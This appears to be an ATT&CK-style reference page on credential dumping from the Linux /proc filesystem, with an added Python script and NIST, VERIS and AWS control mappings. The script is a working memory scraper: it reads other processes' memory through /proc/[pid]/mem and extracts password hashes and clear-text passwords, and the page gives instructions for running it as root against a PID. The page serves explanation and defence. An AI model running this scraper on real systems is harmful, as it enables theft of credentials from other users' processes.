Adversaries may gather credentials from information stored in the Proc filesystem, <code>/proc</code>. The Proc filesystem on Linux contains a great deal of information regarding the state of the running operating system, including a per-process view of memory: <code>/proc/[pid]/maps</code> lists a process's mappings and <code>/proc/[pid]/mem</code> exposes their contents. Processes running with root privileges (more precisely, with ptrace permission over the target, which the kernel checks when <code>/proc/[pid]/mem</code> is opened and which <code>kernel.yama.ptrace_scope</code> further restricts) can use this facility to scrape live memory of other running programs. If any of these programs hold clear-text passwords or password hashes in memory, those values can be harvested for direct use or for brute-force attacks, respectively.
This functionality is implemented in MimiPenguin (Citation: MimiPenguin GitHub May 2017), an open source tool inspired by Mimikatz. The tool dumps process memory, then harvests passwords and hashes by searching it for text strings and regex patterns that match how given applications, such as Gnome Keyring, sshd, and Apache, hold such authentication artifacts in memory.
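As an added example (written for this page; it is not MimiPenguin's code and not part of the ATT&CK entry), the following Python script demonstrates the mechanism described above: it parses <code>/proc/[pid]/maps</code> to select readable heap, stack and anonymous regions, reads those ranges through <code>/proc/[pid]/mem</code>, and scans them for credential-shaped artifacts. The sample maps text and memory bytes are constructed, and the three patterns (a sha512crypt hash, a bcrypt hash, a <code>password=</code> key/value) are generic illustrations rather than the application-specific signatures MimiPenguin uses.

```python
# Added example (not MimiPenguin's code and not part of the ATT&CK page):
# a minimal /proc-based memory scraper showing the technique above.
# Assumes Linux. Reading /proc/[pid]/mem of another process needs ptrace
# permission over it (root / CAP_SYS_PTRACE, subject to kernel.yama.ptrace_scope);
# /proc/self/mem is always readable, which demo_self() relies on.
import os
import re
from typing import Dict, List, NamedTuple, Tuple


class Region(NamedTuple):
    start: int
    end: int
    perms: str   # e.g. "rw-p"
    path: str    # "" for anonymous mappings, "[heap]", "[stack]", or a file path


# One line of /proc/[pid]/maps: start-end perms offset dev inode [pathname]
MAPS_LINE = re.compile(
    r"^([0-9a-f]+)-([0-9a-f]+)\s+(\S{4})\s+\S+\s+\S+\s+\S+(?:\s+(.*))?$"
)

# Generic artifact patterns (illustrative, not MimiPenguin's signatures).
# Group 1, when present, is the value to report; otherwise the whole match.
PATTERNS: Dict[str, re.Pattern] = {
    "sha512crypt": re.compile(rb"\$6\$[./A-Za-z0-9]{1,16}\$[./A-Za-z0-9]{86}"),
    "bcrypt": re.compile(rb"\$2[aby]\$\d\d\$[./A-Za-z0-9]{53}"),
    "kv_password": re.compile(rb"(?i)pass(?:word|wd)?\s*[=:]\s*([^\s\x00&;]{4,64})"),
}

# Constructed sample input (not captured from a real system) for offline use.
SAMPLE_MAPS = """\
55e3b1a00000-55e3b1a21000 r--p 00000000 08:01 1048577 /usr/sbin/sshd
55e3b2c00000-55e3b2c21000 rw-p 00000000 00:00 0 [heap]
7f3c1e000000-7f3c1e021000 rw-p 00000000 00:00 0
7ffd1a2a5000-7ffd1a2c6000 rw-p 00000000 00:00 0 [stack]
ffffffffff600000-ffffffffff601000 --xp 00000000 00:00 0 [vsyscall]
"""
SAMPLE_MEMORY = (
    b"\x00\x00GET /login HTTP/1.1\x00user=alice&password=S3cret-Pass\x00\x00"
    b"root:$6$saltsalt$" + b"a" * 86 + b":19000:0:99999:7:::\x00"
)


def parse_maps(text: str) -> List[Region]:
    """Parse the contents of /proc/[pid]/maps into Region records."""
    regions = []
    for line in text.splitlines():
        m = MAPS_LINE.match(line.strip())
        if m:
            regions.append(Region(int(m.group(1), 16), int(m.group(2), 16),
                                  m.group(3), (m.group(4) or "").strip()))
    return regions


def readable_anonymous(regions: List[Region]) -> List[Region]:
    """Keep readable heap/stack/anonymous mappings, where live secrets sit.
    File-backed mappings (code, libraries) and [vvar]/[vsyscall] are skipped."""
    return [r for r in regions
            if r.perms.startswith("r") and r.path in ("", "[heap]", "[stack]")]


def scan_bytes(data: bytes, patterns: Dict[str, re.Pattern] = PATTERNS) -> List[Tuple[str, str]]:
    """Return (pattern_name, matched_value) for every artifact found in data."""
    hits = []
    for name, rx in patterns.items():
        for m in rx.finditer(data):
            hits.append((name, m.group(m.lastindex or 0).decode("latin-1")))
    return hits


def scrape_process(pid: int, chunk: int = 1 << 20) -> List[Tuple[Region, str, str]]:
    """Read each candidate region of <pid> through /proc/[pid]/mem and scan it.
    Matches that straddle a chunk boundary are missed; a real tool overlaps reads."""
    hits = []
    with open(f"/proc/{pid}/maps") as f:
        regions = readable_anonymous(parse_maps(f.read()))
    with open(f"/proc/{pid}/mem", "rb", buffering=0) as mem:
        for r in regions:
            off = r.start
            while off < r.end:
                n = min(chunk, r.end - off)
                try:
                    mem.seek(off)
                    data = mem.read(n)
                except (OSError, OverflowError):
                    break  # region unmapped since maps was read, or not readable
                if not data:
                    break
                hits.extend((r, name, val) for name, val in scan_bytes(data))
                off += n
    return hits


def demo_self() -> bool:
    """Plant a constructed secret in our own heap and recover it via /proc/self/mem."""
    planted = b"password=S3cret-Pass-constructed"  # constructed marker, kept referenced
    found = any(val == "S3cret-Pass-constructed" for _, _, val in scrape_process(os.getpid()))
    del planted
    return found


if __name__ == "__main__":
    print("planted secret recovered from /proc/self/mem:", demo_self())
```

Run it as root with a target PID (`scrape_process(1234)`) or as any user against itself via `demo_self()`. On a host where `kernel.yama.ptrace_scope` is 2 or 3, opening another process's `mem` file fails for everything short of CAP_SYS_PTRACE (or for everyone, at 3), which is the enforcement point behind the process-isolation and least-privilege controls mapped below.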
NIST SP 800-53 control mappings
Capability ID | Capability Description | Mapping Type | ATT&CK ID | ATT&CK Name | Notes |
---|---|---|---|---|---|
AC-2 | Account Management | Protects | T1003.007 | Proc Filesystem | |
AC-3 | Access Enforcement | Protects | T1003.007 | Proc Filesystem | |
AC-5 | Separation of Duties | Protects | T1003.007 | Proc Filesystem | |
AC-6 | Least Privilege | Protects | T1003.007 | Proc Filesystem | |
CA-7 | Continuous Monitoring | Protects | T1003.007 | Proc Filesystem | |
CM-2 | Baseline Configuration | Protects | T1003.007 | Proc Filesystem | |
CM-5 | Access Restrictions for Change | Protects | T1003.007 | Proc Filesystem | |
CM-6 | Configuration Settings | Protects | T1003.007 | Proc Filesystem | |
IA-2 | Identification and Authentication (Organizational Users) | Protects | T1003.007 | Proc Filesystem | |
IA-5 | Authenticator Management | Protects | T1003.007 | Proc Filesystem | |
SC-28 | Protection of Information at Rest | Protects | T1003.007 | Proc Filesystem | |
SC-39 | Process Isolation | Protects | T1003.007 | Proc Filesystem | |
SI-3 | Malicious Code Protection | Protects | T1003.007 | Proc Filesystem | |
SI-4 | System Monitoring | Protects | T1003.007 | Proc Filesystem | |
VERIS mappings
Capability ID | Capability Description | Mapping Type | ATT&CK ID | ATT&CK Name | Notes |
---|---|---|---|---|---|
action.malware.variety.In-memory | (malware never stored to persistent storage) | related-to | T1003.007 | OS Credential Dumping: Proc Filesystem | |
action.malware.variety.Password dumper | Password dumper (extract credential hashes) | related-to | T1003.007 | OS Credential Dumping: Proc Filesystem | |
AWS security capability mappings
Capability ID | Capability Description | Mapping Type | ATT&CK ID | ATT&CK Name | Notes |
---|---|---|---|---|---|
amazon_inspector | Amazon Inspector | technique_scores | T1003.007 | Proc Filesystem | |
Comments
The Amazon Inspector Best Practices assessment package can assess the security control "Configure permissions for system directories", which prevents privilege escalation by local users and ensures that only the root account can modify or execute system configuration information and binaries. Amazon Inspector does not directly protect against system modifications; rather, it checks whether security controls are in place, which can inform decisions about hardening the system. Because of this, and because the security control is supported only on Linux platforms, the score is Minimal.